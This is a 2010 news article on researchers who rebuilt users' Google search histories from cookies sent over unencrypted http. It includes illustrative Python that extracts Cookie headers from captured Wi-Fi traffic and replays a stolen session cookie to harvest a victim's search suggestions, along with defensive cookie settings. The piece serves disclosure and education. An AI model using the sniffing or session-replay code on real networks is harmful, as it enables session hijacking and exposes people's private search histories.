
Peeking Into Users’ Web History

Researchers hijack Google’s personalized search suggestions to reconstruct users’ search histories.
April 21, 2010

Personalization is a key part of Internet search, providing more relevant results and gaining loyal customers in the process. But new research highlights the privacy risks that this kind of personalization can bring. A team of European researchers, working with a researcher from the University of California, Irvine, found that they were able to hijack Google’s personalized search suggestions to reconstruct users’ Web search histories.

Google has plugged most of the holes identified in the research, but the researchers say that other personalized services are likely to have similar vulnerabilities. “The goal of this project was to show that personalized services are very dangerous in terms of privacy because they can leak information,” says Claude Castelluccia, a senior research scientist at the French National Institute for Research in Computer Science and Control, who was involved with the work. The work will be presented this summer at the Privacy Enhancing Technologies Symposium in Berlin, Germany.

The researchers got hold of personal information by taking advantage of the fact that Google uses two different protocols to communicate with its users’ browsers. Google protects sensitive information, such as passwords, by using a protocol called “https” that encrypts the data as it’s communicated. At other times, for example when handling search queries, Google uses the ordinary “http” protocol, which sends information back and forth in the clear. The researchers say this mixed design can inadvertently reveal information.
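To see why the mixed design matters, consider what a browser actually puts on the wire. The sketch below is for illustration only, with made-up host names and cookie values; it sends the same request, carrying a cookie, over plain http and then over https using Python’s standard library. On http the Cookie header travels as readable text; on https the whole request is encrypted before it leaves the machine.

```python
# Illustrative sketch only: the host names and cookie value are hypothetical.
import http.client

COOKIE = "SID=abc123-example"  # stand-in for a real session cookie

# Over plain http, every header below, including the Cookie,
# crosses the network as readable text that any on-path observer can log.
plain = http.client.HTTPConnection("search.example.com", 80, timeout=10)
plain.request("GET", "/search?q=medical+question",
              headers={"Cookie": COOKIE})
print(plain.getresponse().status)
plain.close()

# Over https, the same request is wrapped in TLS, so an eavesdropper on an
# open Wi-Fi network sees only encrypted bytes and the server's name.
secure = http.client.HTTPSConnection("accounts.example.com", 443, timeout=10)
secure.request("GET", "/auth", headers={"Cookie": COOKIE})
print(secure.getresponse().status)
secure.close()
```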

Google offers a variety of Web services, including Gmail, Google Docs, and Google Calendar. A less well-known service is Google Web History, which records searches made by a user while she is signed in to her Google Account. At the time the researchers were investigating it, Web History was also the source of personalized suggestions that Google offered users on its search page.

The researchers were able to get access to users’ Web History by intercepting cookies, the small files stored on a person’s computer that hold useful bits of information such as authentication credentials or the contents of a shopping cart. For many services, such as Gmail, this information is encrypted before it is sent. At the time, Web History sent its cookies in the clear. By eavesdropping on an unsecured network, such as a public Wi-Fi hotspot, an attacker can intercept Web cookies, and the researchers determined that an intercepted Web History cookie could provide access to the corresponding user’s Web History account.
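How easy is this kind of eavesdropping? The following fragment is a minimal sketch, assuming the third-party scapy library and a packet capture file recorded on a network you are permitted to monitor (for instance, your own traffic on an open hotspot); the file name is hypothetical. It simply walks the capture and prints any Cookie headers that appear in unencrypted port-80 traffic, which was all an attacker in 2010 needed to collect in order to reuse a Web History session.

```python
# Minimal sketch: assumes the third-party scapy package and a capture file,
# e.g. one you recorded of your own traffic on an open Wi-Fi network.
from scapy.all import rdpcap, TCP, Raw

packets = rdpcap("open_wifi_capture.pcap")  # hypothetical file name

for pkt in packets:
    # Only unencrypted web traffic (port 80) carries readable headers.
    if pkt.haslayer(TCP) and pkt[TCP].dport == 80 and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        for line in payload.split(b"\r\n"):
            if line.lower().startswith(b"cookie:"):
                # For https traffic this loop finds nothing: the headers
                # sit inside the encrypted TLS payload.
                print(line.decode(errors="replace"))
```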

History repeating: Google’s Web History was used to create personalized search suggestions until researchers discovered that personal information could be captured by hijacking communications with users.

The researchers also found another way to reconstruct users’ search history. Another cookie–the one that authenticates a user to Google’s search service–is also sent in the clear. By capturing this cookie and impersonating the user in communications with the search service, they were able to run algorithms that quickly reconstructed large portions of a user’s Web search history.
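The paper describes the reconstruction algorithms in detail; the fragment below is only a rough sketch of the general idea, with a hypothetical SUGGEST_URL standing in for the suggestion endpoint of the time, placeholder parameter names and response format, and a captured cookie supplied by the kind of eavesdropping described above. Because the suggestions were personalized from Web History, replaying short prefixes and collecting whatever the service offered back could recover pieces of the victim’s past searches.

```python
# Rough sketch of the idea only; SUGGEST_URL, the parameter names, and the
# response format are placeholders, not Google's actual interface.
import string
import requests

SUGGEST_URL = "http://suggest.example.com/complete"   # hypothetical endpoint
CAPTURED_COOKIE = "SID=abc123-example"                # from the sniffed traffic

def harvest_history():
    """Replay the victim's cookie against the suggestion service,
    asking for completions of every one- and two-letter prefix."""
    recovered = set()
    prefixes = [a + b for a in string.ascii_lowercase
                      for b in ["", *string.ascii_lowercase]]
    for prefix in prefixes:
        resp = requests.get(SUGGEST_URL,
                            params={"q": prefix},
                            headers={"Cookie": CAPTURED_COOKIE},
                            timeout=5)
        # Personalized entries are drawn from the victim's Web History,
        # so any suggestion returned here reflects a past search.
        for suggestion in resp.json():
            recovered.add(suggestion)
    return recovered
```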

Castelluccia says companies should recognize that they need to use secure channels whenever a user’s personal information is being transmitted. “The main lesson of the attack is that companies should use https as much as possible,” he says, adding, “Of course, https has a cost–it means Google has to use more servers, energy, and all that.”
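On the defensive side, the standard fixes are the ones Google eventually applied: serve sensitive endpoints only over https and mark session cookies so that browsers refuse to send them over unencrypted connections. The snippet below is a generic illustration using Python’s standard library, not Google’s configuration; the Secure and HttpOnly cookie attributes and the Strict-Transport-Security header are the relevant mechanisms.

```python
# Generic illustration of the server-side mitigations (not Google's setup).
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["SID"] = "abc123-example"      # hypothetical session identifier
cookie["SID"]["secure"] = True        # browser sends it over https only
cookie["SID"]["httponly"] = True      # and hides it from page scripts
cookie["SID"]["path"] = "/"

# Headers a site would attach to its responses:
print(cookie.output())  # Set-Cookie: SID=...; HttpOnly; Path=/; Secure
print("Strict-Transport-Security: max-age=31536000")  # tell browsers to insist on https
```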

Google responded to the researchers by changing Web History so that it always uses encrypted communications. The company also temporarily suspended its search suggestion service, and suggestions for Google Maps, which the researchers were also able to access, are now encrypted as well.

Alma Whitten, software engineer for Google’s Security and Privacy arm, said in a statement that Google increased its use of https in response to the researchers. “Google has been and continues to be an industry leader in providing support for encryption in our services, which is designed to address precisely the issues that all major websites face when transmitting information over http to users connecting via an unsecured network channel,” she said.

“Google was very reactive and very responsible,” Castelluccia says. However, he notes that search suggestions are still provided to mobile phones and remain vulnerable there. The researchers are keeping track of which services are vulnerable on a website devoted to the project. (Update, May 17, 2010: Google fixed the mobile issue on April 28.)

Ben Adida, a fellow at Harvard University’s Center for Research on Computation and Society, says that intercepting unencrypted traffic is “trivial” today, and “the consequences can be surprisingly privacy-invasive.” He adds, “This work is nice because it concisely shows how half-measures often provide little protection: there is a growing need to move all sensitive services to [https].”

However, Adida warns that encryption won’t solve all privacy problems. “We are slowly entrusting more of our data to large companies that then risk becoming targets of large-scale attacks,” he says. “It’s important to continuously secure these services, but it’s equally important to realize the inherent risk we run by giving this data to third parties in the first place.”
